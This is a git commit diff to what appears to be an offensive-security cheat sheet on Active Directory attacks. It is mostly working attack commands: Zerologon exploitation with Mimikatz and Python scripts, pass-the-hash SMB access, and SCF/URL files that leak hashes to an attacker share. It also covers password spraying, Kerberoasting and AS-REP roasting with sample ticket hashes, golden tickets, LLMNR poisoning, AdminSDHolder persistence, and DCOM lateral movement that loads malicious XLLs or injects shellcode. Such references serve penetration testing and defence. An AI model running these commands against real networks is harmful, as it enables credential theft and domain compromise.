AD update CME+DCOM

2021-04-21 22:27:07 +02:00
parent 22340c8fc2
commit 08b59f2856
6 changed files with 455 additions and 314 deletions
--- a/Injection/README.md
+++ b/Injection/README.md
@@ -28,6 +28,7 @@
 * [GraphQL IDE - An extensive IDE for exploring GraphQL API's](https://github.com/andev-software/graphql-ide)
 * [InQL - A Burp Extension for GraphQL Security Testing](https://github.com/doyensec/inql)
 * [Insomnia - Cross-platform HTTP and GraphQL Client](https://insomnia.rest/)
 * [AutoGraphql + introspection](https://graphql-dashboard.herokuapp.com/)
 ## Exploit
--- a/Resources/Active
+++ b/Resources/Active
@@ -506,6 +506,7 @@ Exploit steps from the white paper
 5. From password change to domain admin
 6. :warning: reset the computer's AD password in a proper way to avoid any Deny of Service
 * `cve-2020-1472-exploit.py` - Python script from dirkjanm
  ```powershell
  $ git clone https://github.com/dirkjanm/CVE-2020-1472.git
@@ -527,8 +528,7 @@ python restorepassword.py CORP/DC01@DC01.CORP.LOCAL -target-ip 172.16.1.5 -hexpa
  deactivate
  ```
-in .NET for Cobalt Strike's execute-assembly
+* `nccfsas` - .NET binary for Cobalt Strike's execute-assembly
  ```powershell
  git clone https://github.com/nccgroup/nccfsas
  # Check
@@ -543,8 +543,7 @@ execute-assembly SharpZeroLogon.exe win-dc01.vulncorp.local -patch
  # Now reset the password back
  ```
-with Mimikatz : 2.2.0 20200917 Post-Zerologon
+* `Mimikatz` - 2.2.0 20200917 Post-Zerologon
  ```powershell
  privilege::debug
  # Check for the CVE
@@ -568,15 +567,15 @@ lsadump::postzerologon /target:10.10.10.10 /account:DC01$
 ### Open Shares
 * [smbmap](https://github.com/ShawnDEvans/smbmap)
  ```powershell
  smbmap -H 10.10.10.10                # null session
  smbmap -H 10.10.10.10 -R             # recursive listing
  smbmap -H 10.10.10.10 -u invaliduser # guest smb session
-smbmap -H 10.10.10.10 -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18
+  smbmap -H 10.10.10.10 -d "DOMAIN.LOCAL" -u "USERNAME" -p "Password123*"
  ```
-or 
+* [pth-smbclient from path-toolkit](https://github.com/byt3bl33d3r/pth-toolkit)
  ```powershell
  pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/Share
  pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/C$
@@ -586,8 +585,7 @@ get # download files
  put # replace a file
  ```
-or 
+* [smbclient from Impacket](https://github.com/SecureAuthCorp/impacket)
  ```powershell
  smbclient -I 10.10.10.100 -L ACTIVE -N -U ""
          Sharename       Type      Comment
@@ -604,11 +602,12 @@ cd Folder     # move inside a folder
  ls            # list files
  ```
-Download a folder recursively
+* [smbclient - from Samba, ftp-like client to access SMB/CIFS resources on servers](#)
  ```powershell
  smbclient -U username //10.0.0.1/SYSVOL
  smbclient //10.0.0.1/Share
  # Download a folder recursively
  smb: \> mask ""
  smb: \> recurse ON
  smb: \> prompt OFF
@@ -616,13 +615,6 @@ smb: \> lcd '/path/to/go/'
  smb: \> mget *
  ```
 Mount a share
 ```powershell
 smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw
 sudo mount -t cifs -o username=<user>,password=<pass> //<IP>/Users folder
 ```
 ### SCF and URL file attack against writeable share
 Drop the following `@something.scf` file inside a share and start listening with Responder : `responder -wrf --lm -v -I eth0`
@@ -630,7 +622,7 @@ Drop the following `@something.scf` file inside a share and start listening with
 ```powershell
 [Shell]
 Command=2
-IconFile=\\10.10.XX.XX\Share\test.ico
+IconFile=\\10.10.10.10\Share\test.ico
 [Taskbar]
 Command=ToggleDesktop
 ```
@@ -641,15 +633,13 @@ This attack also works with `.url` files and `responder -I eth0 -v`.
 [InternetShortcut]
 URL=whatever
 WorkingDirectory=whatever
-IconFile=\\192.168.1.29\%USERNAME%.icon
+IconFile=\\10.10.10.10\%USERNAME%.icon
 IconIndex=1
 ```
 ### Passwords in SYSVOL & Group Policy Preferences
 :triangular_flag_on_post: GPO Priorization : Organization Unit > Domain > Site > Local
 Find password in SYSVOL (MS14-025). SYSVOL is the domain-wide share in Active Directory to which all authenticated users have read access. All domain Group Policies are stored here: `\\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\`.
 ```powershell
@@ -669,30 +659,29 @@ echo 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aS
 #### Automate the SYSVOL and passwords research
-* Metasploit modules to enumerate shares and credentials
+* `Metasploit` modules to enumerate shares and credentials
    ```c
    scanner/smb/smb_enumshares
    post/windows/gather/enum_shares
    post/windows/gather/credentials/gpp
    ```
-* Crackmapexec modules
+* CrackMapExec modules
    ```powershell
-    cme smb 192.168.1.2 -u Administrator -H 89[...]9d -M gpp_autologin
+    cme smb 10.10.10.10 -u Administrator -H 89[...]9d -M gpp_autologin
-    cme smb 192.168.1.2 -u Administrator -H 89[...]9d -M gpp_password
+    cme smb 10.10.10.10 -u Administrator -H 89[...]9d -M gpp_password
    ```
-List all GPO for a domain
+* [Get-GPPPassword](https://github.com/ShutdownRepo/Get-GPPPassword)
  ```powershell
-Get-GPO -domaine DOMAIN.COM -all
+  # with a NULL session
-Get-GPOReport -all -reporttype xml --all
+  Get-GPPPassword.py -no-pass 'DOMAIN_CONTROLLER'
-Powersploit:
+  # with cleartext credentials
-Get-NetGPO
+  Get-GPPPassword.py 'DOMAIN'/'USER':'PASSWORD'@'DOMAIN_CONTROLLER'
-Get-NetGPOGroup
+
  # pass-the-hash
  Get-GPPPassword.py -hashes 'LMhash':'NThash' 'DOMAIN'/'USER':'PASSWORD'@'DOMAIN_CONTROLLER'
  ```
 #### Mitigations
@@ -705,6 +694,8 @@ Get-NetGPOGroup
 > Creators of a GPO are automatically granted explicit Edit settings, delete, modify security, which manifests as CreateChild, DeleteChild, Self, WriteProperty, DeleteTree, Delete, GenericRead, WriteDacl, WriteOwner
 :triangular_flag_on_post: GPO Priorization : Organization Unit > Domain > Site > Local
 GPO are stored in the DC in `\\<domain.dns>\SYSVOL\<domain.dns>\Policies\<GPOName>\`, inside two folders **User** and **Machine**.
 If you have the right to edit the GPO you can connect to the DC and replace the files. Planned Tasks are located at `Machine\Preferences\ScheduledTasks`.
@@ -980,12 +971,19 @@ Most of the time the best passwords to spray are :
 Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing.
-> Kerberos pre-authentication errors are not logged in Active Directory with a normal Logon failure event (4625), but rather with specific logs to Kerberos pre-authentication failure (4771).
+> Kerberos pre-authentication errors are not logged in Active Directory with a normal **Logon failure event (4625)**, but rather with specific logs to **Kerberos pre-authentication failure (4771)**.
 ```powershell
-root@kali:~$ ./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt
+# Username bruteforce
-root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123
+root@kali:~$ ./kerbrute_linux_amd64 userenum -d domain.local --dc 10.10.10.10 usernames.txt
-root@kali:~$ python kerbrute.py -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt
+
 # Password brute
 root@kali:~$ ./kerbrute_linux_amd64 bruteuser -d domain.local --dc 10.10.10.10 rockyou.txt username
 # Password spray
 root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt Password123
 root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt rockyou.txt
 root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt '123456' -v --delay 100 -o kerbrute-passwordspray-123456.log
 ```
 #### Spray a pre-generated passwords list
@@ -1137,8 +1135,10 @@ Forging a TGT require the krbtgt NTLM hash
 ```powershell
 # Get info - Mimikatz
 lsadump::dcsync /user:krbtgt
 lsadump::lsa /inject /name:krbtgt
 lsadump::lsa /patch
 lsadump::trust /patch
 lsadump::dcsync /user:krbtgt
 # Forge a Golden ticket - Mimikatz
 kerberos::purge
@@ -1234,8 +1234,10 @@ Mitigations:
 > "A service principal name (SPN) is a unique identifier of a service instance. SPNs are used by Kerberos authentication to associate a service instance with a service logon account. " - [MSDN](https://docs.microsoft.com/fr-fr/windows/desktop/AD/service-principal-names)
-Any valid domain user can request a kerberos ticket (TGS) for any domain service with `GetUserSPNs`. Once the ticket is received, password cracking can be done offline on the ticket to attempt to break the password for whatever user the service is running as.
+Any valid domain user can request a kerberos ticket (TGS) for any domain service. Once the ticket is received, password cracking can be done offline on the ticket to attempt to break the password for whatever user the service is running as.
 * `GetUserSPNs` from Impacket Suite
  ```powershell
  $ GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
@@ -1245,11 +1247,15 @@ ServicePrincipalName  Name           MemberOf
  --------------------  -------------  --------------------------------------------------------  -------------------  -------------------
  active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 21:06:40  2018-12-03 17:11:11 
-$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$424338c0a3c3af43c360c29c154b012c$c54c7be163ae6c323ae6b5fc45a1eacee2f4903deec785cd689f4551e023775c7e7772fe85e3fb8374ca95534d72c971ba80e8b6d4ef3c3b8439dc54031540133cbcbd5f7b39d622733d198eec594c0cd181ab4696a6ad12744d1ddd2d3e2c6dd33b4daedbc9cae75e8ff2652c80421b0fa3a61ddf2cabeea462c44e0f6d9a6436717e0621bb4e0fe8bd3cf36156b4b2f7b81d651f70baf34a0b3071858b5034b895c25a0d3c67044c849d5952c381a0078a86ae562810a93d9c7bcc8311255cc9eda35a9c4d4d43ff1cc29108056285c954f3c633332ff0cb0c9c0f1896c792b247c8d25f5dd71802728fc99bb22709337b5596ab0e2045110b0b005b03351e9f71a65b48e8259f6191ce95d4e5794846c61c3abccf0f5f72a8679fb0dc0777720f5551ad99c9c9ab0955f85ee211d40b01fcaece7868960b2063923aa0f59e17b347f3308087707e95cad54b9df8179728821cf54cb204c5c2e571d9a66c8ec40b090305aa32e90a90d25ea37be6d8f8a83c683a8b69d386f9edb970596bc56fa02971f69c7e073b8de1213d9caa75ab652e5c5b99cadace9dd7d15d1d530309ea39ca1b7c6009ae3342796a6bdea084622ee95cbade437659e37363b848bad2186e3a9f7dec66e1e496db32d55eda8fb926f057996638646dcc662ed226788ddf36304dc70eaca91b26cb7180341f417fad91117ee10212c69423abd42769cbf891b51d736ffe474899eec8df64abef319d3c6dc379f2bfda33de7c3a1a50d6ece564d4559c77f560b7506fa2f1c9af7162f1247ea35706aafffde48b8cc48b1ec8e99d99ac81dc02f55f43f9726d746383cd076e7199070ff8100846ba9dc2235e92d0c7dac1f33da5fe7901e02f0566030d7c7e02535d6a300292a04e6c32d0d74d37679c2617750f5920d9c697a30c883519bc6b5a916eec354459c7f248c783bd79c436a7e8c463a8981a9e000d21c2d00c7e8468cff0ab695cb3aa4f14f149d1fafb4d656bcd1f67b747fc4c2d648466a386774853db8d50c22df57e747085142f98f5f06191c243b9dbf671da64228364f058c7e2e53a80fdde7f6dc2f25459a09fb2583757953247c222d64f49bc12d461d2e5aa572ceba2605d7eafd6031405ee422ac35cbf041b4fd28e58d871406e053d1a806de49056791646c175bf0d2aaa19f844bfc885520e19c391702be6ae61122fceac32b689764334908a4eaf7c69974a9519ebb068a15c087955fb402416bd184fd2
+  $krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$424338c0a3c3af43[...]84fd2
  ```
-Alternatively with [Rubeus](https://github.com/GhostPack/Rubeus)
+* CrackMapExec Module
  ```powershell
  crackmapexec ldap 10.10.10.100 -u 'username' -p 'password' --kerberoasting output.txt
  ```
 * [Rubeus](https://github.com/GhostPack/Rubeus)
  ```powershell
  # Kerberoast (RC4 ticket)
  .\rubeus.exe kerberoast /creduser:DOMAIN\JOHN /credpassword:MyP@ssW0RD /outfile:hash.txt
@@ -1263,14 +1269,12 @@ Rubeus.exe kerberoast /tgtdeleg
  Rubeus.exe kerberoast /rc4opsec
  ```
-Alternatively with [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1)
+* [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1)
  ```powershell
  Request-SPNTicket -SPN "MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local"
  ```
-Alternatively on macOS machine you can use [bifrost](https://github.com/its-a-feature/bifrost)
+* [bifrost](https://github.com/its-a-feature/bifrost) on **macOS** machine
  ```powershell
  ./bifrost -action asktgs -ticket doIF<...snip...>QUw= -service host/dc1-lab.lab.local -kerberoast true
  ```
@@ -1296,30 +1300,17 @@ Mitigations:
 ### KRB_AS_REP Roasting
-If a domain user does not have Kerberos preauthentication enabled, an AS-REP can be successfully requested for the user, and a component of the structure can be cracked offline a la kerberoasting
+> If a domain user does not have Kerberos preauthentication enabled, an AS-REP can be successfully requested for the user, and a component of the structure can be cracked offline a la kerberoasting
-Prerequisite:
+**Requirements**:
- Accounts have to have **DONT_REQ_PREAUTH** (`PowerView > Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose`)
+- Accounts with the attribute **DONT_REQ_PREAUTH** (`PowerView > Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose`)
 * [Rubeus](https://github.com/GhostPack/Rubeus)
  ```powershell
 C:\>git clone https://github.com/GhostPack/Rubeus#asreproast
  C:\Rubeus>Rubeus.exe asreproast /user:TestOU3user /format:hashcat /outfile:hashes.asreproast
 ______        _
 (_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
 |  __  /| | | |  _ \| ___ | | | |/___)
 | |  \ \| |_| | |_) ) ____| |_| |___ |
 |_|   |_|____/|____/|_____)____/(___/
 v1.3.4
  [*] Action: AS-REP roasting
  [*] Target User            : TestOU3user
  [*] Target Domain          : testlab.local
  [*] SamAccountName         : TestOU3user
  [*] DistinguishedName      : CN=TestOU3user,OU=TestOU3,OU=TestOU2,OU=TestOU1,DC=testlab,DC=local
  [*] Using domain controller: testlab.local (192.168.52.100)
@@ -1331,30 +1322,36 @@ v1.3.4
  [*] AS-REP hash:
  $krb5asrep$TestOU3user@testlab.local:858B6F645D9F9B57210292E5711E0...(snip)...
 C:\Rubeus> john --wordlist=passwords_kerb.txt hashes.asreproast
  ```
-Using `impacket` to get the hash and `hashcat` to crack it.
+* `GetNPUsers` from Impacket Suite
  ```powershell
 # example
  $ python GetNPUsers.py htb.local/svc-alfresco -no-pass
 Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
  [*] Getting TGT for svc-alfresco
-$krb5asrep$23$svc-alfresco@HTB.LOCAL:c13528009a59be0a634bb9b8e84c88ee$cb8e87d02bd0ac7ae561334cd58a56af90f7fbb20bbd4493b6754a57d5ebc08cb7f47ea472ebb7c9ba4260f57c11b664be03191550254e5c77a17518aeabc55f9321bd9f52201df820e130aa0e3f4b0986725fd3a14794433881050eb62d384c4058a407a348a7de2ef0767a99c9df4f85d8eba8ce30a4ad59621c51f8ea8c0d33f33e06bea1d8ff28d7a86fc2010fd7fa45d2fcc2178cb13c1006823aec8a5da10cffcceeb6e978754b0d4976df5cccb4beb9776d5a8f4810153ccc0e1237ec74e6ae61402457c6cfe29bca7c2f62b287f13aff063f5a0a21c728581e43b46d7537b3e776b4
+  $krb5asrep$23$svc-alfresco@HTB.LOCAL:c13528009a59be0a634bb9b8e84c88ee$cb8e87d02bd0ac7a[...]e776b4
  # extract hashes
  root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
  root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast
 # crack AS_REP messages
 root@kali:impacket-examples$ hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt 
 root@windows:hashcat$ hashcat64.exe -m 18200 '<AS_REP-hash>' -a 0 c:\wordlists\rockyou.txt
  ```
-Mitigations: 
+* CrackMapExec Module
  ```powershell
  crackmapexec ldap 10.10.10.100 -u 'username' -p 'password' --asreproast output.txt
  ```
 Using `hashcat` or `john` to crack the ticket.
 ```powershell
 # crack AS_REP messages with hashcat
 root@kali:impacket-examples$ hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt 
 root@windows:hashcat$ hashcat64.exe -m 18200 '<AS_REP-hash>' -a 0 c:\wordlists\rockyou.txt
 # crack AS_REP messages with john
 C:\Rubeus> john --format=krb5asrep --wordlist=passwords_kerb.txt hashes.asreproast
 ```
 **Mitigations**: 
 * All accounts must have "Kerberos Pre-Authentication" enabled (Enabled by Default).
 ### Pass-the-Hash
@@ -1431,14 +1428,15 @@ C:\Users\triceratops>.\PsExec.exe -accepteula \\labwws02.jurassic.park cmd
 If any user in the network tries to access a machine and mistype the IP or the name, Responder will answer for it and ask for the NTLMv2 hash to access the resource. Responder will poison `LLMNR`, `MDNS` and `NETBIOS` requests on the network.
 ```python
 python Responder.py -I eth0
 ```
 Then crack the hash with `hashcat`
 ```powershell
-hashcat -m 5600 -a 0 hash.txt crackstation.txt
+# https://github.com/lgandx/Responder
 $ sudo ./Responder.py -I eth0 -wfrd -P -v
 # https://github.com/Kevin-Robertson/InveighZero
 PS > .\inveighzero.exe -FileOutput Y -NBNS Y -mDNS Y -Proxy Y -MachineAccounts Y -DHCPv6 Y -LLMNRv6 Y [-Elevated N]
 # https://github.com/EmpireProject/Empire/blob/master/data/module_source/collection/Invoke-Inveigh.ps1
 PS > Invoke-Inveigh [-IP '10.10.10.10'] -ConsoleOutput Y -FileOutput Y -NBNS Y –mDNS Y –Proxy Y -MachineAccounts Y
 ```
 ### Man-in-the-Middle attacks & relaying
@@ -1452,6 +1450,12 @@ NTLMv1 and NTLMv2 can be relayed to connect to another machine.
 | NTLMv1/Net-NTLMv1     | 5500  | crack/relay attack   |
 | NTLMv2/Net-NTLMv2     | 5600  | crack/relay attack   |
 Crack the hash with `hashcat`.
 ```powershell
 hashcat -m 5600 -a 0 hash.txt crackstation.txt
 ```
 #### MS08-068 NTLM reflection
 NTLM reflection vulnerability in the SMB protocolOnly targeting Windows 2000 to Windows Server 2008.
@@ -1467,7 +1471,7 @@ msf exploit(smb_relay) > show targets
 #### SMB Signing Disabled and IPv4
-If a machine has `SMB signing`:`disabled`, it is possible to use Responder with Multirelay.py script to perform an `NTLMv2 hashes relay` and get a shell access on the machine.
+If a machine has `SMB signing`:`disabled`, it is possible to use Responder with Multirelay.py script to perform an `NTLMv2 hashes relay` and get a shell access on the machine. Also called **LLMNR/NBNS Poisoning**
 1. Open the Responder.conf file and set the value of `SMB` and `HTTP` to `Off`.
    ```powershell
@@ -1584,20 +1588,22 @@ ntlmrelayx -smb2support --no-smb-server --gpotato-startup rat.exe
 ### Dangerous Built-in Groups Usage
-If you do not want modified ACLs to be overwrite every hour, you should change ACL template on the object "CN=AdminSDHolder,CN=System," or set "adminCount" attribute to 0 for the required object.
+If you do not want modified ACLs to be overwritten every hour, you should change ACL template on the object `CN=AdminSDHolder,CN=System` or set `"dminCount` attribute to `0` for the required object.
->  The AdminCount attribute is set to 1 automatically when a user is assigned to any privileged group, but it is never automatically unset when the user is removed from these group(s).
+>  The AdminCount attribute is set to `1` automatically when a user is assigned to any privileged group, but it is never automatically unset when the user is removed from these group(s).
 Find users with `AdminCount=1`.
 ```powershell
-python ldapdomaindump.py -u example.com\john -p pass123 -d ';' 10.100.20.1
+crackmapexec ldap 10.10.10.10 -u username -p password --admin-count
 # or
 python ldapdomaindump.py -u example.com\john -p pass123 -d ';' 10.10.10.10
 jq -r '.[].attributes | select(.adminCount == [1]) | .sAMAccountName[]' domain_users.json
-or
+# or
 Get-ADUser -LDAPFilter "(objectcategory=person)(samaccountname=*)(admincount=1)"
 Get-ADGroup -LDAPFilter "(objectcategory=group) (admincount=1)"
-or
+# or
 ([adsisearcher]"(AdminCount=1)").findall()
 ```
@@ -1605,19 +1611,18 @@ or
 > The Access Control List (ACL) of the AdminSDHolder object is used as a template to copy permissions to all "protected groups" in Active Directory and their members. Protected groups include privileged groups such as Domain Admins, Administrators, Enterprise Admins, and Schema Admins.
-If you modify the permissions of **AdminSDHolder**, that permission template will be pushed out to all protected accounts automatically by SDProp (in an hour).
+If you modify the permissions of **AdminSDHolder**, that permission template will be pushed out to all protected accounts automatically by `SDProp` (in an hour).
 E.g: if someone tries to delete this user from the Domain Admins in an hour or less, the user will be back in the group.
 ```powershell
 # Add a user to the AdminSDHolder group:
-Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -PrincipalIdentity matt -Rights All
+Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=domain,DC=local' -PrincipalIdentity username -Rights All -Verbose
 # Right to reset password for toto using the account titi
 Add-ObjectACL -TargetSamAccountName toto -PrincipalSamAccountName titi -Rights ResetPassword
 # Give all rights
 Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName toto -Verbose -Rights All
 Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -PrincipalIdentity matt -Rights All
 ```
@@ -1634,20 +1639,43 @@ ADACLScan.ps1 -Base "DC=contoso;DC=com" -Filter "(&(AdminCount=1))" -Scope subtr
 * **GenericAll on User** : We can reset user's password without knowing the current password
 * **GenericAll on Group** : Effectively, this allows us to add ourselves (the user spotless) to the Domain Admin group : `net group "domain admins" spotless /add /domain`
-GenericAll/GenericWrite we can set a SPN on a target account, request a TGS, then grab its hash and kerberoast it.
+* **GenericAll/GenericWrite** : We can set a **SPN** on a target account, request a TGS, then grab its hash and kerberoast it.
  ```powershell
 # using PowerView
  # Check for interesting permissions on accounts:
  Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentinyReferenceName -match "RDPUsers"}
  # Check if current user has already an SPN setted:
-Get-DomainUser -Identity <UserName> | select serviceprincipalname
+  PowerView2 > Get-DomainUser -Identity <UserName> | select serviceprincipalname
  # Force set the SPN on the account:
-Set-DomainObject <UserName> -Set @{serviceprincipalname='ops/whatever1'}
+  PowerView2 > Set-DomainObject <UserName> -Set @{serviceprincipalname='ops/whatever1'}
  # Grab the ticket
  PowerView2 > $User = Get-DomainUser username 
  PowerView2 > $User | Get-DomainSPNTicket | fl
  PowerView2 > $User | Select serviceprincipalname
  # Remove the SPN
  PowerView2 > Set-DomainObject -Identity username -Clear serviceprincipalname
  ```
 * **GenericAll/GenericWrite** : We can change a victim's **userAccountControl** to not require Kerberos preauthentication, grab the user's crackable AS-REP, and then change the setting back.
  ```powershell
  # Modify the userAccountControl
  PowerView2 > Get-DomainUser username | ConvertFrom-UACValue
  PowerView2 > Set-DomainObject -Identity username -XOR @{useraccountcontrol=4194304} -Verbose
  # Grab the ticket
  PowerView2 > Get-DomainUser username | ConvertFrom-UACValue
  ASREPRoast > Get-ASREPHash -Domain domain.local -UserName username
  # Set back the userAccountControl
  PowerView2 > Set-DomainObject -Identity username -XOR @{useraccountcontrol=4194304} -Verbose
  PowerView2 > Get-DomainUser username | ConvertFrom-UACValue
  ```
 #### GenericWrite
 * Reset another user's password
@@ -1745,7 +1773,24 @@ Set-DomainUserPassword -Identity 'TargetUser' -AccountPassword $NewPassword
 ### DCOM Exploitation
-> DCOM is an extension of COM (Component Object Model), which allows applications to instantiate and access the properties and methods of COM objects on a remote computer
+> DCOM is an extension of COM (Component Object Model), which allows applications to instantiate and access the properties and methods of COM objects on a remote computer.
 * CheeseTools - https://github.com/klezVirus/CheeseTools
  ```powershell
  -t, --target=VALUE         Target Machine
  -b, --binary=VALUE         Binary: powershell.exe
  -a, --args=VALUE           Arguments: -enc <blah>
  -m, --method=VALUE         Methods: MMC20Application, ShellWindows,
                              ShellBrowserWindow, ExcelDDE, VisioAddonEx,
                              OutlookShellEx, ExcelXLL, VisioExecLine, 
                              OfficeMacro
  -r, --reg, --registry      Enable registry manipulation
  -h, -?, --help             Show Help
  Current Methods: MMC20.Application, ShellWindows, ShellBrowserWindow, ExcelDDE, VisioAddonEx, OutlookShellEx, ExcelXLL, VisioExecLine, OfficeMacro.
  ```
  https://klezvirus.github.io/RedTeaming/LateralMovement/LateralMovementDCOM/
 #### DCOM via MMC Application Class 
@@ -1763,7 +1808,20 @@ PS C:\> [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Appl
 Invoke-MMC20RCE : https://raw.githubusercontent.com/n0tty/powershellery/master/Invoke-MMC20RCE.ps1
-#### DCOM via Excel
+#### DCOM via Office
 * Excel.Application
  * DDEInitiate
  * RegisterXLL
 * Outlook.Application
  * CreateObject->Shell.Application->ShellExecute
  * CreateObject->ScriptControl (office-32bit only)
 * Visio.InvisibleApp (same as Visio.Application, but should not show the Visio window)
  * Addons
  * ExecuteLine
 * Word.Application
  * RunAutoMacro
 ```ps1
 # Powershell script that injects shellcode into excel.exe via ExecuteExcel4Macro through DCOM
@@ -1774,6 +1832,17 @@ Invoke-ExShellcode.ps1 https://gist.github.com/Philts/f7c85995c5198e845c70cc51cd
 PS C:\> $excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "$ComputerName"))
 PS C:\> $excel.DisplayAlerts = $false
 PS C:\> $excel.DDEInitiate("cmd", "/c calc.exe")
 # Using Excel RegisterXLL
 # Can't be used reliably with a remote target
 Require: reg add HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Locations /v AllowsNetworkLocations /t REG_DWORD /d 1
 PS> $excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "$ComputerName"))
 PS> $excel.RegisterXLL("EvilXLL.dll")
 # Using Visio
 $visio = [activator]::CreateInstance([type]::GetTypeFromProgID("Visio.InvisibleApp", "$ComputerName"))
 $visio.Addons.Add("C:\Windows\System32\cmd.exe").Run("/c calc")
 ```
 #### DCOM via ShellExecute
@@ -1840,9 +1909,8 @@ domainA.local      domainB.local                  TreeRoot       Bidirectional
 Most trees are linked with dual sided trust relationships to allow for sharing of resources.
 By default the first domain created if the Forest Root.
-Prerequisite: 
+**Requirements**: 
 - KRBTGT Hash
 - Find the SID of the domain
    ```powershell
    $ Convert-NameToSid target.domain.com\krbtgt
@@ -1907,7 +1975,7 @@ ls \\machine.domain.local\c$
 The goal is to gain DC Sync privileges using a computer account and the SpoolService bug.
-Prerequisites:
+**Requirements**:
 - Object with Property **Trust this computer for delegation to any service (Kerberos only)**
 - Must have **ADS_UF_TRUSTED_FOR_DELEGATION** 
 - Must not have **ADS_UF_NOT_DELEGATED** flag
@@ -1916,20 +1984,25 @@ Prerequisites:
 ##### Find delegation
 :warning: : Domain controllers usually have unconstrained delegation enabled.    
 Check the `TrustedForDelegation` property.
 * [ADModule](https://github.com/samratashok/ADModule)
  ```powershell
  # From https://github.com/samratashok/ADModule
  PS> Get-ADComputer -Filter {TrustedForDelegation -eq $True}
  ```
-or 
+* [ldapdomaindump](https://github.com/dirkjanm/ldapdomaindump)
-
+  ```powershell
  $> ldapdomaindump -u "DOMAIN\\Account" -p "Password123*" 10.10.10.10   
  grep TRUSTED_FOR_DELEGATION domain_computers.grep
  ```
-NOTE: Domain controllers usually have unconstrained delegation enabled
+* [CrackMapExec module](https://github.com/byt3bl33d3r/CrackMapExec/wiki) 
-
+  ```powershell
  cme ldap 10.10.10.10 -u username -p password --trusted-for-delegation
  ```
 ##### SpoolService status
--- a/Resources/Office
+++ b/Resources/Office
@@ -647,3 +647,4 @@ E
 * [Executing macros from docx with remote - RedXORBlueJuly 18, 2018](http://blog.redxorblue.com/2018/07/executing-macros-from-docx-with-remote.html)
 * [One thousand and one ways to copy your shellcode to memory (VBA Macros) - X-C3LL - Feb 18, 2021](https://adepts.of0x.cc/alternatives-copy-shellcode/)
 * [Running macros via ActiveX controls - greyhathacker - September 29, 2016](http://www.greyhathacker.net/?p=948)
 * [Anti-Analysis Techniques Used in Excel 4.0 Macros - 24 March 2021 - @Jacob_Pimental](https://www.goggleheadedhacker.com/blog/post/23)
--- a/Resources/Windows
+++ b/Resources/Windows
@@ -8,6 +8,7 @@
 * [Network Enumeration](#network-enumeration)
 * [Antivirus & Detections](#antivirus--detections)
    * [Windows Defender](#windows-defender)
    * [Firewall](#firewall)
    * [AppLocker Enumeration](#applocker-enumeration)
    * [Powershell](#powershell)
    * [Default Writeable Folders](#default-writeable-folders)
@@ -97,6 +98,11 @@
    python3 wes.py --update
    python3 wes.py systeminfo.txt
    ```
 - [PrivescCheck - Privilege Escalation Enumeration Script for Windows](https://github.com/itm4n/PrivescCheck)
    ```powershell
    C:\Temp\>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"
    C:\Temp\>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended"
    ```
 ## Windows Version and Configuration
@@ -184,6 +190,14 @@ Get-LocalGroupMember Administrators | ft Name, PrincipalSource
 Get-LocalGroupMember Administrateurs | ft Name, PrincipalSource
 ```
 Get Domain Controllers
 ```powershell
 nltest /DCLIST:DomainName
 nltest /DCNAME:DomainName
 nltest /DSGETDC:DomainName
 ```
 ## Network Enumeration
 List all network interfaces, IP, and DNS.
@@ -214,30 +228,6 @@ List all current connections
 netstat -ano
 ```
 List firewall state and current configuration
 ```powershell
 netsh advfirewall firewall dump
 or 
 netsh firewall show state
 netsh firewall show config
 ```
 List firewall's blocked ports
 ```powershell
 $f=New-object -comObject HNetCfg.FwPolicy2;$f.rules |  where {$_.action -eq "0"} | select name,applicationname,localports
 ```
